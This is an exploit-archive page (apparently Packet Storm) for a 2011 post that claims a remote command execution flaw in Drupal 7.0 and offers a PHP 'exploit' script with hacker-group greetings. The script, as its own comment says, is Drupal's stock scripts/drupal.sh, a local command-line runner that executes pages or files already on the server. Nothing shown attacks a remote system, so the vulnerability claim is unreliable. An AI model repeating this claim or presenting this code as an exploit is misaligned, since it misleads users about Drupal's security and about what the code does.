exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Drupal 7.0 Shell Execution

Drupal 7.0 Shell Execution
Posted Apr 10, 2011
Authored by KedAns-Dz

Drupal version 7.0 suffers from a remote command execution vulnerability.

tags | exploit, remote
SHA-256 | ae379d3ee6258d3421cda34112b5c194d06dfda66bb8a74d6d48cea995174149

Drupal 7.0 Shell Execution

Change Mirror Download
#!/usr/bin/env php
<?php

/**
* Drupal 7.0 Shell Execution Script
* ================
* By KedAns-Dz <ked-h@exploit-id.com>
* ================
* (+) In any Drupal , detecting the file >> http://[local/Path]/scripts/drupal.sh
* The content file 'drupal.sh' is this PHP CODE for EXECUTING Scripts
* ================
* ------------------------
* Check for your PHP interpreter - on Windows you'll probably have to
* replace line 1 with :
* #!c:/program files/php/php.exe
* @param path Drupal's absolute root directory in local file system (optional).
* @param URI A URI to execute, including HTTP protocol prefix.
*/
$script = basename(array_shift($_SERVER['argv']));

if (in_array('--help', $_SERVER['argv']) || empty($_SERVER['argv'])) {
echo <<<EOF

Execute a Drupal page from the shell.

Usage: {$script} [OPTIONS] "<URI>"
Example: {$script} "http://target.org/node"

All arguments are long options.

--help This page.

--root Set the working directory for the script to the specified path.
To execute Drupal this has to be the root directory of your
Drupal installation, f.e. /home/www/foo/drupal (assuming Drupal
running on Unix). Current directory is not required.
Use surrounding quotation marks on Windows.

--verbose This option displays the options as they are set, but will
produce errors from setting the session.

URI The URI to execute, i.e. http://default/foo/bar for executing
the path '/foo/bar' in your site 'default'. URI has to be
enclosed by quotation marks if there are ampersands in it
(f.e. index.php?q=node&foo=bar). Prefix 'http://' is required,
and the domain must exist in Drupal's sites-directory.

If the given path and file exists it will be executed directly,
i.e. if URI is set to http://default/bar/foo.php
and bar/foo.php exists, this script will be executed without
bootstrapping Drupal. To execute Drupal's cron.php, specify
http://default/cron.php as the URI.


To run this script without --root argument invoke it from the root directory
of your Drupal installation with

./scripts/{$script}
\n
EOF;
exit;
}

// define default settings
$cmd = 'index.php';
$_SERVER['HTTP_HOST'] = 'default';
$_SERVER['PHP_SELF'] = '/index.php';
$_SERVER['REMOTE_ADDR'] = '127.0.0.1';
$_SERVER['SERVER_SOFTWARE'] = NULL;
$_SERVER['REQUEST_METHOD'] = 'GET';
$_SERVER['QUERY_STRING'] = '';
$_SERVER['PHP_SELF'] = $_SERVER['REQUEST_URI'] = '/';
$_SERVER['HTTP_USER_AGENT'] = 'console';

// toggle verbose mode
if (in_array('--verbose', $_SERVER['argv'])) {
$_verbose_mode = true;
}
else {
$_verbose_mode = false;
}

// parse invocation arguments
while ($param = array_shift($_SERVER['argv'])) {
switch ($param) {
case '--root':
// change working directory
$path = array_shift($_SERVER['argv']);
if (is_dir($path)) {
chdir($path);
if ($_verbose_mode) {
echo "cwd changed to: {$path}\n";
}
}
else {
echo "\nERROR: {$path} not found.\n\n";
}
break;

default:
if (substr($param, 0, 2) == '--') {
// ignore unknown options
break;
}
else {
// parse the URI
$path = parse_url($param);

// set site name
if (isset($path['host'])) {
$_SERVER['HTTP_HOST'] = $path['host'];
}

// set query string
if (isset($path['query'])) {
$_SERVER['QUERY_STRING'] = $path['query'];
parse_str($path['query'], $_GET);
$_REQUEST = $_GET;
}

// set file to execute or Drupal path (clean urls enabled)
if (isset($path['path']) && file_exists(substr($path['path'], 1))) {
$_SERVER['PHP_SELF'] = $_SERVER['REQUEST_URI'] = $path['path'];
$cmd = substr($path['path'], 1);
}
elseif (isset($path['path'])) {
if (!isset($_GET['q'])) {
$_REQUEST['q'] = $_GET['q'] = $path['path'];
}
}

// display setup in verbose mode
if ($_verbose_mode) {
echo "Hostname set to: {$_SERVER['HTTP_HOST']}\n";
echo "Script name set to: {$cmd}\n";
echo "Path set to: {$_GET['q']}\n";
}
}
break;
}
}

if (file_exists($cmd)) {
include $cmd;
}
else {
echo "\nERROR: {$cmd} not found.\n\n";
}
exit();
/***============================================================================================
***================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
* Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
* Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
* Masimovic * TOnyXED * r0073r (inj3ct0r.com) * TreX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
* Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (1923turk.com)
* Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
* Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
* Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
* 1337day.com * www.packetstormsecurity.org * exploit-db.com * bugsearch.net * exploit-id.com
* www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
*================================================================================================
*/
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close